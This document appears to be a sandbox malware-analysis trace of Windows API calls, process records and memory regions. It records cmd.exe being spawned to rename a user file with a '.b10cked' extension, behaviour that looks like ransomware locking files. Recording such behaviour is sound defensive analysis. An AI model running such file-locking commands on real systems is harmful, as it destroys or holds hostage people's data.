0x1d0e68 [0201.832] FindNextFileW (in: hFindFile=0x1d0e68, lpFindFileData=0x12e8b4 | out: lpFindFileData=0x12e8b4) returned 0 [0201.833] FindClose (in: hFindFile=0x1d0e68 | out: hFindFile=0x1d0e68) returned 1 [0201.833] GetLastError () returned 0x12 [0201.833] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x12e8b4, 
fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e8b4) returned 0x1d0e68 [0201.833] FindNextFileW (in: hFindFile=0x1d0e68, lpFindFileData=0x12e8b4 | out: lpFindFileData=0x12e8b4) returned 0 [0201.833] FindClose (in: hFindFile=0x1d0e68 | out: hFindFile=0x1d0e68) returned 1 [0201.833] GetLastError () returned 0x12 [0201.834] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1e1bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1e1bd8) returned 0x1d0e68 [0201.834] FindNextFileW (in: hFindFile=0x1d0e68, lpFindFileData=0x1e1bd8 | out: lpFindFileData=0x1e1bd8) returned 0 [0201.834] FindClose (in: hFindFile=0x1d0e68 | out: hFindFile=0x1d0e68) returned 1 [0201.835] GetLastError () returned 0x12 [0201.835] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1e1bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1e1bd8) returned 0x1d0e68 [0201.835] FindNextFileW (in: hFindFile=0x1d0e68, lpFindFileData=0x1e1bd8 | out: lpFindFileData=0x1e1bd8) returned 0 [0201.835] FindClose (in: hFindFile=0x1d0e68 | out: hFindFile=0x1d0e68) returned 1 [0201.835] GetLastError () returned 0x12 [0201.835] _get_osfhandle (_FileHandle=2) returned 0xb [0201.835] GetFileType (hFile=0xb) returned 0x2 [0201.836] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0201.836] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12ea84 | out: lpMode=0x12ea84) returned 1 [0201.836] _get_osfhandle (_FileHandle=2) returned 0xb [0201.836] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x12eab8 | out: lpConsoleScreenBufferInfo=0x12eab8) returned 1 [0201.840] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") 
returned 0x2c [0201.841] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x12eaf8 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.841] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x12eadc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12eadc*=0x2c) returned 1 [0201.842] longjmp () [0201.843] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.843] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.843] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.843] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.844] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.844] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.844] SetConsoleInputExeNameW () returned 0x1 [0201.844] GetConsoleOutputCP () returned 0x1b5 [0201.848] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.848] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.850] exit (_Code=1) Process: id = "478" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d20" os_pid = "0xe78" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.DEV.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], 
"NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29366 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29367 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29368 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29369 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 29370 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29371 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29372 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29373 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29374 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 29375 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29926 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000010000" filename = "" Region: id = 29927 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29928 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29929 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 29930 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 29931 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29932 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29933 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29934 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29935 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29936 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" 
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29937 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29938 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29939 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29940 start_va = 0x410000 end_va = 0x4d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 29941 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29942 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29943 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 29944 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 29945 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 29946 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 29947 start_va = 0x4e0000 end_va = 0x5e0fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 29948 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 29949 start_va = 0x11f0000 end_va = 0x1352fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Region: id = 29983 start_va = 0x1360000 end_va = 0x141ffff entry_point = 0x1360000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 675 os_tid = 0xddc [0202.487] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fecc | out: lpSystemTimeAsFileTime=0x16fecc*(dwLowDateTime=0xad80d820, dwHighDateTime=0x1d440a9)) [0202.487] GetCurrentProcessId () returned 0xe78 [0202.487] GetCurrentThreadId () returned 0xddc [0202.487] GetTickCount () returned 0x3924f [0202.487] QueryPerformanceCounter (in: lpPerformanceCount=0x16fec4 | out: lpPerformanceCount=0x16fec4*=25927650611) returned 1 [0202.488] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0202.488] __set_app_type (_Type=0x1) [0202.488] __p__fmode () returned 0x76b331f4 [0202.488] __p__commode () returned 0x76b331fc [0202.488] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0202.488] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0202.488] GetCurrentThreadId () returned 0xddc [0202.488] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xddc) returned 0x38 [0202.488] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.488] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0202.488] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.488] 
HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.489] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fe5c | out: phkResult=0x16fe5c*=0x0) returned 0x2 [0202.489] VirtualQuery (in: lpAddress=0x16fe93, lpBuffer=0x16fe2c, dwLength=0x1c | out: lpBuffer=0x16fe2c*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.489] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fe2c, dwLength=0x1c | out: lpBuffer=0x16fe2c*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.489] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fe2c, dwLength=0x1c | out: lpBuffer=0x16fe2c*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.489] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fe2c, dwLength=0x1c | out: lpBuffer=0x16fe2c*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.489] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fe2c, dwLength=0x1c | out: lpBuffer=0x16fe2c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0202.489] GetConsoleOutputCP () returned 0x1b5 [0202.489] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.489] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0202.489] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.489] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.489] _get_osfhandle (_FileHandle=1) returned 0x7 
[0202.489] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.489] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.489] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.489] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.489] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.490] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.490] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.490] GetEnvironmentStringsW () returned 0x320190* [0202.490] FreeEnvironmentStringsW (penv=0x320190) returned 1 [0202.490] GetEnvironmentStringsW () returned 0x320190* [0202.490] FreeEnvironmentStringsW (penv=0x320190) returned 1 [0202.490] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16edcc | out: phkResult=0x16edcc*=0x40) returned 0x0 [0202.490] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x0, lpData=0x16edd8*=0xb8, lpcbData=0x16edd0*=0x1000) returned 0x2 [0202.490] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x4, lpData=0x16edd8*=0x1, lpcbData=0x16edd0*=0x4) returned 0x0 [0202.490] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x0, lpData=0x16edd8*=0x1, lpcbData=0x16edd0*=0x1000) returned 0x2 [0202.490] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x4, lpData=0x16edd8*=0x0, lpcbData=0x16edd0*=0x4) returned 0x0 [0202.490] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", 
lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x4, lpData=0x16edd8*=0x40, lpcbData=0x16edd0*=0x4) returned 0x0 [0202.490] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x4, lpData=0x16edd8*=0x40, lpcbData=0x16edd0*=0x4) returned 0x0 [0202.490] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x0, lpData=0x16edd8*=0x40, lpcbData=0x16edd0*=0x1000) returned 0x2 [0202.490] RegCloseKey (hKey=0x40) returned 0x0 [0202.491] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16edcc | out: phkResult=0x16edcc*=0x40) returned 0x0 [0202.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x0, lpData=0x16edd8*=0x40, lpcbData=0x16edd0*=0x1000) returned 0x2 [0202.491] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x4, lpData=0x16edd8*=0x1, lpcbData=0x16edd0*=0x4) returned 0x0 [0202.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x0, lpData=0x16edd8*=0x1, lpcbData=0x16edd0*=0x1000) returned 0x2 [0202.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x4, lpData=0x16edd8*=0x0, lpcbData=0x16edd0*=0x4) returned 0x0 [0202.491] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, 
lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x4, lpData=0x16edd8*=0x9, lpcbData=0x16edd0*=0x4) returned 0x0 [0202.491] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x4, lpData=0x16edd8*=0x9, lpcbData=0x16edd0*=0x4) returned 0x0 [0202.491] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x0, lpData=0x16edd8*=0x9, lpcbData=0x16edd0*=0x1000) returned 0x2 [0202.491] RegCloseKey (hKey=0x40) returned 0x0 [0202.491] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a4 [0202.491] srand (_Seed=0x5b8863a4) [0202.491] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.DEV.14.1033.hxn.b10cked\"" [0202.491] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.DEV.14.1033.hxn.b10cked\"" [0202.491] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.491] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3218f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.491] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.491] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.492] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="") returned 0x0 [0202.492] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.492] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.492] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.492] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.492] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.492] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.492] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.492] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.492] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.492] GetEnvironmentStringsW () returned 0x3222e0* [0202.492] FreeEnvironmentStringsW (penv=0x3222e0) returned 1 [0202.492] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.492] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.492] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.492] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.492] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.492] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.492] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.492] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.492] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.492] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.492] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16fb98 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.492] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16fb98, lpFilePart=0x16fb94 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", 
lpFilePart=0x16fb94*="Desktop") returned 0x18 [0202.492] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.492] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f914 | out: lpFindFileData=0x16f914) returned 0x320020 [0202.493] FindClose (in: hFindFile=0x320020 | out: hFindFile=0x320020) returned 1 [0202.493] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f914 | out: lpFindFileData=0x16f914) returned 0x320020 [0202.493] FindClose (in: hFindFile=0x320020 | out: hFindFile=0x320020) returned 1 [0202.493] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f914 | out: lpFindFileData=0x16f914) returned 0x320020 [0202.493] FindClose (in: hFindFile=0x320020 | out: hFindFile=0x320020) returned 1 [0202.493] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.493] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0202.493] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0202.493] GetEnvironmentStringsW () returned 0x322b00* [0202.493] FreeEnvironmentStringsW (penv=0x322b00) returned 1 [0202.493] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.494] GetConsoleOutputCP () returned 0x1b5 [0202.494] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.494] GetUserDefaultLCID () returned 0x409 [0202.494] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0202.494] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fcd8, cchData=128 | out: lpLCData="0") returned 2 [0202.494] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fcd8, cchData=128 | out: 
lpLCData="0") returned 2 [0202.494] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fcd8, cchData=128 | out: lpLCData="1") returned 2 [0202.494] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0202.494] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0202.494] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0202.494] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0202.494] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.494] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0202.494] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0202.494] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0202.495] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0202.495] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0202.495] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.495] GetConsoleTitleW (in: lpConsoleTitle=0x3108e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.496] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.496] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0202.496] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0202.496] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0202.496] 